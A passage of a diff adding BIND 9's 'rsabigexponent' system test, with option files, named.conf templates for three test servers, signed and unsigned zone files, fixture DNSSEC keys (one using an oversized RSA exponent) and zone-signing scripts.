+rm -f ns*/named.memstats +rm -f ns1/root.db +rm -f ns2/signer.err +rm -f dig.out.* +rm -f ns*/named.lock +rm -f ns*/named.conf +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/rsabigexponent/conf/bad01.conf b/bin/tests/system/rsabigexponent/conf/bad01.conf new file mode 100644 index 0000000..720d197 --- /dev/null +++ b/bin/tests/system/rsabigexponent/conf/bad01.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + max-rsa-exponent-size 1; +}; diff --git a/bin/tests/system/rsabigexponent/conf/bad02.conf b/bin/tests/system/rsabigexponent/conf/bad02.conf new file mode 100644 index 0000000..bd1e827 --- /dev/null +++ b/bin/tests/system/rsabigexponent/conf/bad02.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + max-rsa-exponent-size 34; +}; diff --git a/bin/tests/system/rsabigexponent/conf/bad03.conf b/bin/tests/system/rsabigexponent/conf/bad03.conf new file mode 100644 index 0000000..4331b52 --- /dev/null +++ b/bin/tests/system/rsabigexponent/conf/bad03.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + max-rsa-exponent-size 4097; +}; diff --git a/bin/tests/system/rsabigexponent/conf/good01.conf b/bin/tests/system/rsabigexponent/conf/good01.conf new file mode 100644 index 0000000..1d2cd01 --- /dev/null +++ b/bin/tests/system/rsabigexponent/conf/good01.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + max-rsa-exponent-size 0; +}; diff --git a/bin/tests/system/rsabigexponent/conf/good02.conf b/bin/tests/system/rsabigexponent/conf/good02.conf new file mode 100644 index 0000000..861e054 --- /dev/null +++ b/bin/tests/system/rsabigexponent/conf/good02.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + max-rsa-exponent-size 35; +}; diff --git a/bin/tests/system/rsabigexponent/conf/good03.conf b/bin/tests/system/rsabigexponent/conf/good03.conf new file mode 100644 index 0000000..14a98f8 --- /dev/null +++ b/bin/tests/system/rsabigexponent/conf/good03.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + max-rsa-exponent-size 4096; +}; diff --git a/bin/tests/system/rsabigexponent/ns1/named.conf.in b/bin/tests/system/rsabigexponent/ns1/named.conf.in new file mode 100644 index 0000000..4a9822d --- /dev/null +++ b/bin/tests/system/rsabigexponent/ns1/named.conf.in @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type primary; + file "root.db.signed"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/rsabigexponent/ns1/root.db.in b/bin/tests/system/rsabigexponent/ns1/root.db.in new file mode 100644 index 0000000..0486325 --- /dev/null +++ b/bin/tests/system/rsabigexponent/ns1/root.db.in @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2012050600 ; serial + 3600 ; refresh + 1200 ; retry + 604800 ; expire + 60 ; minimum + ) +@ NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 +; +example. NS ns2.example. +ns2.example. A 10.53.0.2 diff --git a/bin/tests/system/rsabigexponent/ns1/sign.sh b/bin/tests/system/rsabigexponent/ns1/sign.sh new file mode 100755 index 0000000..d045fe2 --- /dev/null +++ b/bin/tests/system/rsabigexponent/ns1/sign.sh @@ -0,0 +1,34 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=. +infile=root.db.in +zonefile=root.db + +cp ../ns2/dsset-example.in dsset-example$TP + +keyname=`$KEYGEN -q -a RSASHA256 -b 2048 -n zone $zone` + +cat $infile $keyname.key > $zonefile + +$SIGNER -P -g -o $zone $zonefile > /dev/null + +# Configure the resolving server with a static key. +keyfile_to_static_ds $keyname > trusted.conf +cp trusted.conf ../ns2/trusted.conf +cp trusted.conf ../ns3/trusted.conf + +cd ../ns2 && $SHELL -e ./sign.sh diff --git a/bin/tests/system/rsabigexponent/ns2/Xexample.+008+51650.key b/bin/tests/system/rsabigexponent/ns2/Xexample.+008+51650.key new file mode 100644 index 0000000..60ff187 --- /dev/null +++ b/bin/tests/system/rsabigexponent/ns2/Xexample.+008+51650.key @@ -0,0 +1,5 @@ +; This is a key-signing key, keyid 51650, for example. +; Created: 20220721024334 (Thu Jul 21 12:43:34 2022) +; Publish: 20220721024334 (Thu Jul 21 12:43:34 2022) +; Activate: 20220721024334 (Thu Jul 21 12:43:34 2022) +example. IN DNSKEY 257 3 8 AwEAAeeXAGBcXxSNj5X/PWT8XDBk4U9OUkZ7YKQBf2IN3V6OZomt/s3F UWIh70Wot+z1Ld3Rfswq1DjCaWNRFOMhs+9j3Fhc46wMZ4pnsDW1nLHk 2TnQRdrbiuhLkQy5oNMjSRxu924XLw5ylsuqjxE7vXcCeKSFe674roSq wo39atWsTJMDz0FQGxlPucnXai0nHoCeC7+u1s+wLaGcpNSZlsab7Zny FD4HZ3HKUCJw/Jjr5CZjqal9KdmWSC1SINRtlAN6PX5VSiNEncnYMCdj iv+ZhRGn+aHh1BmEWomGbAm2Jjw5mrYMgDs9lJRc5Vtg0YXb9OkYvxNF V4QGw1oeF+M= diff --git a/bin/tests/system/rsabigexponent/ns2/Xexample.+008+51650.private b/bin/tests/system/rsabigexponent/ns2/Xexample.+008+51650.private new file mode 100644 index 0000000..d38a0b3 --- /dev/null +++ b/bin/tests/system/rsabigexponent/ns2/Xexample.+008+51650.private @@ -0,0 +1,13 @@ +Private-key-format: v1.3 +Algorithm: 8 (RSASHA256) +Modulus: 55cAYFxfFI2Plf89ZPxcMGThT05SRntgpAF/Yg3dXo5mia3+zcVRYiHvRai37PUt3dF+zCrUOMJpY1EU4yGz72PcWFzjrAxnimewNbWcseTZOdBF2tuK6EuRDLmg0yNJHG73bhcvDnKWy6qPETu9dwJ4pIV7rviuhKrCjf1q1axMkwPPQVAbGU+5yddqLScegJ4Lv67Wz7AtoZyk1JmWxpvtmfIUPgdnccpQInD8mOvkJmOpqX0p2ZZILVIg1G2UA3o9flVKI0SdydgwJ2OK/5mFEaf5oeHUGYRaiYZsCbYmPDmatgyAOz2UlFzlW2DRhdv06Ri/E0VXhAbDWh4X4w== +PublicExponent: AQAB +PrivateExponent: QaMgBa+YeRxIElS1g14tCMBGxXHmyrgkI0eTYWiZkbedYy8v1QU0NDJ2/NC9VEkHF2PNYrNO08lyEiaEW32NYG92n4qwMm6PmAAcRpSzFQ5N7N9VNRrdK0pjkW45IS5Shd8DfK3QdfFPQOkVxGYgpE7Mf6Cfde9gkxRMsO6erXEud6KyBm8kwBR/ipDeUQvpyGkZEQPjLxJG6REjMVhPKTzCV+82DWEf+Ok/3Uxa94+ocAbySHAV3j4YcWpVGWT002gc6CGk8c6TsPYnDkfKQ3moPQZijH7F8zrARtoobCX9TsMFhBqReceZrbzN7en2cZGR5MSISzoTNSr4rGo6aQ== +Prime1: 8AV9EllWtclD62XHo95Z3h7JJ9t2gY7fUFG0WMbkI0Wj6kcr7k3bFfLj7GEJ1qgVW4Qpu7XnBvPB9hnqoCkbHLzc8ws1D2tY+PsXzvw9IxoXNM/eCobeulu/rYhJl2PcpY9bPcaaR0hldGoCHdFYSo8oi+C5hfRtIMVjnDtHSmk= +Prime2: 9wHRxgyHjtl8ro9HAkvujxFkhChm4xLxIRM8pfZ+D1VHpzFRD3/RK8CVYVRB8GsQoFRygHBMOW1oHqynN9jddvJrQbHOqFZAbQQlesp0jRPd9Mm6q0cDwYcD4apscB2CUrUswMzoD3H4saIjGnitCsG/t+sLTvuK/giuMdS2Tms= +Exponent1: pnSH+pOuiL+dtMCPJVvsoxhilJukodD9mewv0GmOic+gD7dwBgJEcAJUgvgBJLbIqQENGDrcj3u5Bf2PM6eOP+3SpVMeZyUhPPqV1lwj4hYUBfIqoM5L5J4AXk5oCu+cc8zpj/wNvmW8xnFGKnumaX7Ctc8Rmo6ap+F8ZTrPBBE= +Exponent2: txXZKIRnAkJAwZ6f0pr3w4Hv0GmmAZArvQlmPdncDH94sfvDCssB/v0rfE4Y5hxl4YFWsc8LINHwiDQPajzLwvvi9nnWJT5xWJznLwHbrCparbPNMmFb7lmmTeGlqOCmlamG942qQLCI1xnIDTn/gWalNaz539xhZPSIMZVqX+s= +Coefficient: eK9cQKFRLaU4udqB8t8KSQxlNl0x9J+9bcaEzn0+579LrZUZvspfiR4DNGwr9qK+PWk+CU7/6xsWbq2zbKIEWucoR97t+E8Zhx00GCDbiu/QI2wviEcYbB2udznRv1WSIDoCWf2TXeh5G2E2ugt5F4+b56qMXmT7IudxYGPtQCY= +Created: 20220721024334 +Publish: 20220721024334 +Activate: 20220721024334 diff --git a/bin/tests/system/rsabigexponent/ns2/Xexample.+008+52810.key b/bin/tests/system/rsabigexponent/ns2/Xexample.+008+52810.key new file mode 100644 index 0000000..a1f14c9 --- /dev/null +++ b/bin/tests/system/rsabigexponent/ns2/Xexample.+008+52810.key @@ -0,0 +1,2 @@ +; This is a zone-signing key, keyid 52810, for example. +example. IN DNSKEY 256 3 8 BwEAAAAAAAHYYy161+wCg6yFHRlyex8oVkcK+K2SBUryI1+DEKzjusH6 yLfzzlJCPGrubmD+jseKYwXfzelJkRQbMDjWbMYLHKytuPtwnJMSeVh+ a/Ore6oVPXy716EYpsEBSmVjfQyS0mGHpwrYk4QaKjJDM7Q173EFl/sE eXjHqInlzOgJbXqsCrSfA94anSt42DGhJeeIfQ8b3vqD/nCnA6C7khIt AWlfJto7d42Ev8tckjr3CrTW9tn9pHb2DKeh85rKeJBBLMYQU3jfF5KH EEsjztLGMnPLlXTteh8wKrk/0IJrot17w0FR0H2v8oG3xDXxfhJ0OeTW 7dtBHD6ISgqeJ9zt diff --git a/bin/tests/system/rsabigexponent/ns2/Xexample.+008+52810.private b/bin/tests/system/rsabigexponent/ns2/Xexample.+008+52810.private new file mode 100644 index 0000000..bbb5ad9 --- /dev/null +++ b/bin/tests/system/rsabigexponent/ns2/Xexample.+008+52810.private @@ -0,0 +1,10 @@ +Private-key-format: v1.3 +Algorithm: 8 (RSASHA256) +Modulus: 2GMtetfsAoOshR0ZcnsfKFZHCvitkgVK8iNfgxCs47rB+si3885SQjxq7m5g/o7HimMF383pSZEUGzA41mzGCxysrbj7cJyTEnlYfmvzq3uqFT18u9ehGKbBAUplY30MktJhh6cK2JOEGioyQzO0Ne9xBZf7BHl4x6iJ5czoCW16rAq0nwPeGp0reNgxoSXniH0PG976g/5wpwOgu5ISLQFpXybaO3eNhL/LXJI69wq01vbZ/aR29gynofOayniQQSzGEFN43xeShxBLI87SxjJzy5V07XofMCq5P9CCa6Lde8NBUdB9r/KBt8Q18X4SdDnk1u3bQRw+iEoKnifc7Q== +PublicExponent: AQAAAAAAAQ== +PrivateExponent: aD+JLNdCtAk1++UwcGdPslSoWq2szZHGrY+I+YfhfcBZrPP13exC40hgUgRNuYJOaJ3WMpgsKI4p8YDVNttF6LI7WNBURQhmBSwquB5BWWkoh7uR4PfKWGB0ZkDwUQcA2IdMVS4+QAKVQMmUXGnXhQI1p8duAORZp0gE71VsHTEzwf5AIEG2+f/oCjDsMJN0J7X3qktJr5ho64aMHyHf5+yKk6fFcy7wfC175SkIZ53uBfpCsFXkgq8YukXfcyoG5o4FUHheGnDwkVOzviEUHk8xweJnNNRbV6n/ck9AXzq3VSA9BbrXtRzZmre/L6tJvEnbH0EycwDkxCMlOSqGbQ== +Prime1: /hnW5M2vzAoAjx2wum98YZZ6gv1IpV88c4HDLA3vY79Qxd8FYanldxPNjgQJEPjHD5hG6tGN+cjZdXv/X+sk5j3fmCB7RKwMKcoD8A/jyH2JaQLTbXm6EBd1BCMIN+w3W+A2E6evYYyINLwMUwqRlUcAaD8HoDLK8iz6iAUhFss= +Prime2: 2gEuuug1PDnbWWFVzzMUrVXiRiFqJVTTvR3AjJVJNZPwAL4FMenh98rtI3s1zSB6P4RSyvRJ6YMOAT0ZrMxviJy76EExGgCB5F4w7g67I7VGPuA1tLn5kt5j9j5wQmdq1yMG5QpCJWr7bxjSDYvIzy2sZjZ/KTuHGtUzFUnHrCc= +Exponent1: MaDlpmDYxZ2QvM+cp58Bj160u+21qIA/UZ2ysh6102uQmYHm92481z2+AvCJuq2PpkuROMd/4i2w7L0RbfZ2MYzUFndLZ8NgmNDjNDfUzeRQl2KQdAOLK4DNXmf3mKwLO0Sbj/pxgj0vYAe9gcU4Pe8ukVuSX0nkehbDi4cjfr0= +Exponent2: cNHFlVCwvEPNVnpQCZS3iqF/D3HN8FtP2st0CrYbjQI8DYpcQUWVMqUqdqFOkYM0/qadpkX+JMlPJTjJZ8YDYYWIZGSC2ruMPIxB7DayVDBbgugmsC1isZjyApdQ44xtdNVyMYmcYeHUz5gR1x/eWdGNyjzMEvfbEjXIKbRykAM= +Coefficient: ovH/7MP64Dai8draXD3t+jl6UTchig+LDwXA2GvlZY0HVP+9yvE49VSKhoYxolL/ZmabIgzzOAyJ66SyYq31ozxbpKrBGiFdzAbgkJgFIbdYMgfLHXNkH1vissGeY0KdS5ee6sKDfk1VmE94UOVHi11oslvnTiG2RF/I3koYV7Q= diff --git a/bin/tests/system/rsabigexponent/ns2/dsset-example.in b/bin/tests/system/rsabigexponent/ns2/dsset-example.in new file mode 100644 index 0000000..9ad254b --- /dev/null +++ b/bin/tests/system/rsabigexponent/ns2/dsset-example.in @@ -0,0 +1 @@ +example. IN DS 51650 8 2 F225122667540159A30620B2D0888036BDF76276D245DE3453C883F0C3276705 diff --git a/bin/tests/system/rsabigexponent/ns2/example.db.bad b/bin/tests/system/rsabigexponent/ns2/example.db.bad new file mode 100644 index 0000000..b105978 --- /dev/null +++ b/bin/tests/system/rsabigexponent/ns2/example.db.bad @@ -0,0 +1,156 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +example. 300 IN SOA mname1. . ( + 2012050601 ; serial + 3600 ; refresh (1 hour) + 600 ; retry (10 minutes) + 604800 ; expire (1 week) + 3600 ; minimum (1 hour) + ) + 300 RRSIG SOA 8 1 300 ( + 20361231235959 20000101000000 52810 example. + IfZrUTjdr4Ull5MSQW4eHxrub6X5O8VWB3vG + kg6TBT8f2Aw4hLcwT0X47xRqL9nU1kKA3qpu + mi71wqiZPbYI+suHYGuqRO/V6YujdQRpLhGS + gTpLmETa46unkMDY6sze41AlCyzR79yaDxVS + +pS2V1AVYzQzzeswJXHwSLO5HKtClPL3izpV + AJD1+dL0UZRs9yOqbxU1RgvASPFEt+1Wd2p6 + qwyeadJ7PB0PL7QQXSDsQ09Ms1BGoKq5p6Os + HtgXPo+aZQR2gczm3Yals9I1tZnk/ZM86aS0 + 63NrEEUQycMNCr100WgWzYQzO90SmJMqpdeZ + fxzlRQbY7jN4qRbM7A== ) + 300 NS ns2.example. + 300 RRSIG NS 8 1 300 ( + 20361231235959 20000101000000 52810 example. + VUPhDucH6rlx93V13b7OSAQ6fE/9jlxhCTXv + peBD69WOa4jZHMZf60gqy10gLVMx35gZdEaU + cJqaBcAniSwPY3a7mxclMja7fmuCB9wcSbiP + pwk5KIYSgIvoWp3ro2I19C0IDQDVWtH1xqdQ + Dv+3MV39Zpf0AnXB05mBopI2DQI9mYHCnmis + F3pfcfs+h/ipyodE5kccBBRvtfKWHly342Xe + azHKM4eyuGj9NLwuwsoVgnyQ3I9hrKVAiUjS + fQ4cxyBVhh+Wb1/VrVSbX+X9VNzQ04mcREHS + yXIPoIQBNju3dyOSTQ+VIeasRvRU8nqMS/1f + oeqj5ehTjtfejF6Jfw== ) + 300 NSEC a.example. NS SOA RRSIG NSEC DNSKEY + 300 RRSIG NSEC 8 1 300 ( + 20361231235959 20000101000000 52810 example. + bG90DOCaN7BhihvtCUs2eJhSHkRaV582ROQi + AbamawevX8NQGJeVpHb3t5ekQuK5EWjLFr6i + bga5TpeP8HOv3lDb8w7kb7xOrHycw5Sizws5 + PZTvtuty9nT6dZ9h4pfLNTbW+SBV904xv3JT + ZlXoxtm4JAdmKUcGiCFLjMvwbQ5SKEZq27uN + 9xCeY0CPkQmiGbTrySYFyNZsBBsL2OI5ec2V + TbQVSDhnnEhbVdMb8Yh2sTt9H/CT1yG2s4U9 + a9ccxguFzt6mk+f5ZL+WKgxkTOMOrZW3dyiI + x53dNQyZN/tczibox/LLG/SaET5wR/V5gDsh + 9DObfc9u1+of/H0lhg== ) + 300 DNSKEY 257 3 8 ( + AwEAAeeXAGBcXxSNj5X/PWT8XDBk4U9OUkZ7 + YKQBf2IN3V6OZomt/s3FUWIh70Wot+z1Ld3R + fswq1DjCaWNRFOMhs+9j3Fhc46wMZ4pnsDW1 + nLHk2TnQRdrbiuhLkQy5oNMjSRxu924XLw5y + lsuqjxE7vXcCeKSFe674roSqwo39atWsTJMD + z0FQGxlPucnXai0nHoCeC7+u1s+wLaGcpNSZ + lsab7ZnyFD4HZ3HKUCJw/Jjr5CZjqal9KdmW + SC1SINRtlAN6PX5VSiNEncnYMCdjiv+ZhRGn + +aHh1BmEWomGbAm2Jjw5mrYMgDs9lJRc5Vtg + 0YXb9OkYvxNFV4QGw1oeF+M= + ) ; KSK; alg = RSASHA256 ; key id = 51650 + 300 DNSKEY 256 3 8 ( + BwEAAAAAAAHYYy161+wCg6yFHRlyex8oVkcK + +K2SBUryI1+DEKzjusH6yLfzzlJCPGrubmD+ + jseKYwXfzelJkRQbMDjWbMYLHKytuPtwnJMS + eVh+a/Ore6oVPXy716EYpsEBSmVjfQyS0mGH + pwrYk4QaKjJDM7Q173EFl/sEeXjHqInlzOgJ + bXqsCrSfA94anSt42DGhJeeIfQ8b3vqD/nCn + A6C7khItAWlfJto7d42Ev8tckjr3CrTW9tn9 + pHb2DKeh85rKeJBBLMYQU3jfF5KHEEsjztLG + MnPLlXTteh8wKrk/0IJrot17w0FR0H2v8oG3 + xDXxfhJ0OeTW7dtBHD6ISgqeJ9zt + ) ; ZSK; alg = RSASHA256 ; key id = 52810 + 300 RRSIG DNSKEY 8 1 300 ( + 20361231235959 20000101000000 52810 example. + O4q1oueEgPoWHhrLiobGvMQLS2KHN+xxSddf + y6fqksqivRLgj0633fnEZrFtc44YueV+L4gQ + kaoWCCpR0yQH4BOw4p3FVjEgl+jXLzIc7amw + ZfKAnSOtMoTaBCQ2hN8b2ducUHgKV7ta9bca + lO0wuqqp2OOO/n9S3YMBVfrCW4jL2w1QPC+b + lm/4ka8OwqKKGAcO0d/nGeOPJZnfbddSzqEQ + C3j1tGavwBC4RAGilxw3XoyoICDp0LQR7M9a + tWAxYmMfilEEfpip9R3HhCa+ynIVsHP8yTXE + dlWM3LUZePm44aV38YeObJpRMkb8sO5VrbZn + 8hJoIs3eyguC4HKKTg== ) + 300 RRSIG DNSKEY 8 1 300 ( + 20361231235959 20000101000000 51650 example. + Eaw79mOoImGg+ymMJ+9paoanUgR/Od0Pxv/X + mevid1TRbssSc2KynAToxSXRcOQwRQjto9sC + qj0pOekPPmW1I6DRlMOGDS6l0Uuk51GvUuRD + Xbr19BG73mcPuKfYHNbx6cUHvBlPilnjM803 + m9E8DK6Ba9uo/MNhgtWoWj8wQxqP2YS+HW3v + bOv/p4en9Dc5ft6ATtSYj84ejuPAKnfVbleI + fJW+qIQ7q9A24xEZ4QlWuRovjsoASVsuLnX+ + X4sQYlWBIPMQYQ8RIN1CgSRPGb603pAq9ru6 + ySpjlxHQRtdOGBNJleg9Wz612rHRd3x7BM+8 + /Lvz31Ot/JSh3u4DSQ== ) +a.example. 300 IN A 10.0.0.1 + 300 RRSIG A 8 2 300 ( + 20361231235959 20000101000000 52810 example. + zp4L0Um0guehtT+4GQaMeYx5PiwEbSRyi7sg + Xv2uFn/wFML/Df0PgCxCYkWKL2Db/j15IZON + uz2CNRG7lDMZsb+JgyLZ6R3OuSKjwzA++kUu + 8ExPpdrFHxZFMPefkU1vjf7E1yt4/aSaO23T + m0F6yFHcVfBE1DElG1vLWO6cWtSIMKjXOo15 + Zy2hHhT/7jKhqcHnwwCBHLuV9/e9OmI34H7I + Sd3Ik8dnNEjRTVbLem3tQMfQ9ZfYDHPHli+z + Z5dGgPmpyNPq5bfs7O5uCO5cNCbouFdEnc6O + DA9QiyOGba8w7vI1gHMvA+rWPpA+fTGgrVRq + 7bTfa0jTOsybR8rZjg== ) + 300 NSEC ns2.example. A RRSIG NSEC + 300 RRSIG NSEC 8 2 300 ( + 20361231235959 20000101000000 52810 example. + oh6oqdC9OIoO0jIN0x9MIBlYlzAg2LFYffrP + QlgPAtPn8A9cPCxU2i6hJ1ubqc6o1LVD7LH6 + GVj842Ytys1uO2Nwf9xXS4gbchJ6NE9IjQh6 + IoBNmlgdfprzJEJlEFx73dytakfcjc+hIj8t + b14Lu2/5BBDSamw+uVyeV8Wg2jNdrN7UEqyA + ccnhLPWHAOtspzxrmCrBDPc6Geelu8KzARs5 + qOZ/p9CKffmKL/65K/N8WWKQWVNI22tAbiWT + J1t3BNkOLUSKMvEVLFcgStV4QtFcQrSB96Hu + D2rSbAGsH5Ujmz4GTxhOSqd8OJ7XDEWlhZod + LhUBltfjmakorhGqqg== ) +ns2.example. 300 IN A 10.53.0.2 + 300 RRSIG A 8 2 300 ( + 20361231235959 20000101000000 52810 example. + sDlETJwDoWqYZdcwYBW/l+Ot4Tb3mSXJvW3R + 1fsoiq/obWZeC+bU2MszckcZKPET2CRqBD+c + uLCcOhZrcH0m25Y02SAzOOG2V12KNvWVznSz + bZw+/+ucYhxhiNKherdwpHOAdjlhG//zFHDy + sAxmrtjWO2DT9pv1Hd/Hm3aGgAYTs0ryyeyo + k05sTgdr43APFkX4SNoNXGUEt8E0uMghIvhi + mgKSQ45fZFsZeUiEfwvtQ8uAuDNOLWK49Bw5 + 184QrQ/NZ3YVyJercg7wm/jFMVkgxggiOl2q + ZCLadaSQNnsvtbwgyTktRJb5YovzZEQrH7O0 + vW/DAN1Cqa1nXw/kZA== ) + 300 NSEC example. A RRSIG NSEC + 300 RRSIG NSEC 8 2 300 ( + 20361231235959 20000101000000 52810 example. + DyLuymW3Bv6irCLzfUGnz2cy1XctqfW7ycLc + 7wgDzDLNvJ6tqr8tjHKMdCODJDiG+lR5oFo7 + 8RA604OYcmJjLIAMj3fCxzBkIlH5SXRcJ86X + a8U6oXrgt6IvUMC2crdWMVgVnSWlqBS4TNNg + QhUa+vt+Em8ce3fveqh1tXm1hzysSroOQtMk + HOPAtwYR9XP4mTdbC43AU/67jsYPqXq59lm4 + sE1tmnVdhXuOk7yNAt8O2CSZGGZl5bYMC4On + IgWZP7liebXAmhmXpHbBf5/BaE9dVfvWzYTT + 4wUch+f8TDwwyTqumrlrPsVnvkQ9V0LwODox + PxWWxFAznmUMEtlo3g== ) diff --git a/bin/tests/system/rsabigexponent/ns2/example.db.in b/bin/tests/system/rsabigexponent/ns2/example.db.in new file mode 100644 index 0000000..a2a6964 --- /dev/null +++ b/bin/tests/system/rsabigexponent/ns2/example.db.in @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2012050601 ; serial + 3600 ; refresh + 600 ; retry + 604800 ; expire + 3600 ; minimum + ) + NS ns2 +ns2 A 10.53.0.2 + +a A 10.0.0.1 diff --git a/bin/tests/system/rsabigexponent/ns2/named.conf.in b/bin/tests/system/rsabigexponent/ns2/named.conf.in new file mode 100644 index 0000000..7a15fd7 --- /dev/null +++ b/bin/tests/system/rsabigexponent/ns2/named.conf.in @@ -0,0 +1,38 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db.bad"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/rsabigexponent/ns2/sign.sh b/bin/tests/system/rsabigexponent/ns2/sign.sh new file mode 100755 index 0000000..015f6a9 --- /dev/null +++ b/bin/tests/system/rsabigexponent/ns2/sign.sh @@ -0,0 +1,29 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=example. +infile=example.db.in +outfile=example.db.bad + +for i in Xexample.+008+51650.key Xexample.+008+51650.private \ + Xexample.+008+52810.key Xexample.+008+52810.private +do + cp $i `echo $i | sed s/X/K/` +done + +$SIGNER -g -s 20000101000000 -e 20361231235959 -o $zone \ + $infile Kexample.+008+52810.key \ + > /dev/null 2> signer.err || true diff --git a/bin/tests/system/rsabigexponent/ns3/named.conf.in b/bin/tests/system/rsabigexponent/ns3/named.conf.in new file mode 100644 index 0000000..bc63656 --- /dev/null +++ b/bin/tests/system/rsabigexponent/ns3/named.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; 